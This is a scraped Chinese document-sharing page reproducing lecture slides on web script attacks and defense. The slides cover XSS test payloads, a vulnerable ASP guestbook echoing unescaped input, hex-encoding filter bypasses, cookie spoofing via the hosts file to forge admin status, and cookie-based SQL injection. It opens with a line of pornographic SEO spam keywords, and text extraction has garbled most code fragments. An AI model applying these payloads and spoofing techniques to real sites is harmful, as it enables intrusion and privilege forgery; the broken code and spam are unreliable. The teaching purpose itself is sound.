freepeople性欧美熟妇, 色戒完整版无删减158分钟hd, 无码精品国产vα在线观看DVD, 丰满少妇伦精品无码专区在线观看,艾栗栗与纹身男宾馆3p50分钟,国产AV片在线观看,黑人与美女高潮,18岁女RAPPERDISSSUBS,国产手机在机看影片

正文內(nèi)容

網(wǎng)絡(luò)腳本攻擊與防御ppt-閱讀頁

2024-12-23 11:50本頁面
  

【正文】 用來顯示一條信息和一個(gè)按鈕。 3:escape() :它將字符串中所有的非字母字符轉(zhuǎn)換為用字母數(shù)字表示的等價(jià)字符串 ,具有編碼字符串的功能 .一般情況下 ,cookie通常由服務(wù)器端的程序通過 HTTP請(qǐng)求和響應(yīng)頭發(fā)送給瀏覽器。 ? Cookie是由服務(wù)器端生成,發(fā)送給 UserAgent(一般是瀏覽器),瀏覽器會(huì)將 Cookie的 key/value保存到某個(gè)目錄下的文本文件內(nèi),下次請(qǐng)求同一網(wǎng)站時(shí)就發(fā)送該 Cookie給服務(wù)器(前提是瀏覽器設(shè)置為啟用 cookie)。 ? HTML ? HEAD ? % ? If request(login)=login Then ? name=request(name) ? liuyan=request(liuyan) ? (VisitorName)=(name) ? End If ? % ? /HEAD ? BODY ? form action= method=post ? TABLE border=1 width=52% id=table1 cellpadding=0 ? TR ? TD用戶名 /TD ? TDinput type=text name=name size=20/TD ? /TR ? TR ? TD留言 /TD ? TDinput type=text name=liuyan size=60/TD ? /TR ? tr ? td input type=submit name=submit value=提交 /td ? /tr ? input type=hidden name=login value=login ? TR ? TD %(name)%/TD ? TD %(liuyan)%/TD ? /TR ? /TABLE ? /form ? /BODY ? /HTML ? % ? a=(QUERY_STRING) ? testfile=() ? set fs=() ? set thisfile=(testfile,8,True,0) ? (amp。 ) ? ? set fs = nothing ? % 實(shí)例演示: ; 輸入: 輸入:script(39。+)/script 跨站腳本攻擊的突破和限制 1. 首先提交 ,能彈出窗口,說明跨站攻擊成功。x3C。x3E。58alert(“饒過第二個(gè)限制!” ), amp?!? str=replace(str,amp。x26。x20。x3C。x3E。,amp。) ? str=replace(str, ,amp。) ? str ? br ? img src=amp。/img ? % 4 利用 cookie的攻擊 ? Cookie文件名稱格式: 你的用戶名 產(chǎn)生的 COOKIE的網(wǎng)頁文件所在的WEB目錄 [COOKIE改變的次數(shù) ].txt 如: ibmbaidu[1].txt ? 設(shè)置 cookie腳本 SetCookie: name = VALUE。 path = PATH。 Cookie欺騙原理 按照瀏覽器的約定,只有來自同一域名的 cookie才可以讀寫,而 cookie只是瀏覽器的,對(duì)通訊協(xié)議無影響,所以要進(jìn)行 cookie欺騙可以有多種途徑: 1、跳過瀏覽器,直接對(duì)通訊數(shù)據(jù)改寫 2、修改瀏覽器,讓瀏覽器從本地可以讀寫任意域名 cookie 3、使用簽名腳本,讓瀏覽器從本地可以讀寫任意域名 cookie(有安全問題) 4、欺騙瀏覽器,讓瀏覽器獲得假的域名 第四種方法思路 首先構(gòu)造 3個(gè)頁面: ? (服務(wù)器正常頁面) ? (測(cè)試頁面) ? (本機(jī)欺騙頁面) script language=vbs =level amp。 user amp。expires=Monday, 01Jan08 12:00:00 GMT msgbox /script script language=vbs =level amp。 admin amp。expires=Monday, 01Jan08 12:00:00 GMT /script script language=vbs co= le=mid(co,instr(co,=)+1,len(co)instr(co,=)+1) if le=user then msgbox you are a user else if le=admin then msgbox you are a administrator else msgbox you not login end if end if /script ?正常訪問 ,得到用戶名為user。 ?設(shè)置本機(jī)上設(shè)置的 host文件,訪問本地服務(wù)器的頁面 ;然后刪除本地 host文件所設(shè)置的信息,然后訪問遠(yuǎn)程服務(wù)器正常頁面 ,讀出 cookie,發(fā)現(xiàn)現(xiàn)在用戶變成了 admin了。cstr(request(id)) sql sql=select * from news where id=amp。 ? %id=request(id)%呢?這個(gè)時(shí)候程序是按以下順序來搜索集合: querystring, form,cookie, servervariable。 要求: name和 value中不能包含分號(hào) ,逗號(hào)及空白。 如: alert(=“id=”+escape(“50 “and 1=1”) ? 意思是設(shè)置調(diào)用當(dāng)前創(chuàng)建的 cookie數(shù)據(jù)項(xiàng)值 ,在設(shè)置 cookie時(shí) ,它們首先保存在瀏覽器的內(nèi)存中 ,退出瀏覽器時(shí) ,才能被寫入到硬盤中 . ? 語句解釋: (50“and 1=1”)有分號(hào) ,逗號(hào)及空白 ,所以我們要用到escape()函數(shù)對(duì)他們進(jìn)行編碼。提交。 ?接著刷新,然后直接訪問
點(diǎn)擊復(fù)制文檔內(nèi)容
教學(xué)課件相關(guān)推薦
文庫吧 www.dybbs8.com
備案圖鄂ICP備17016276號(hào)-1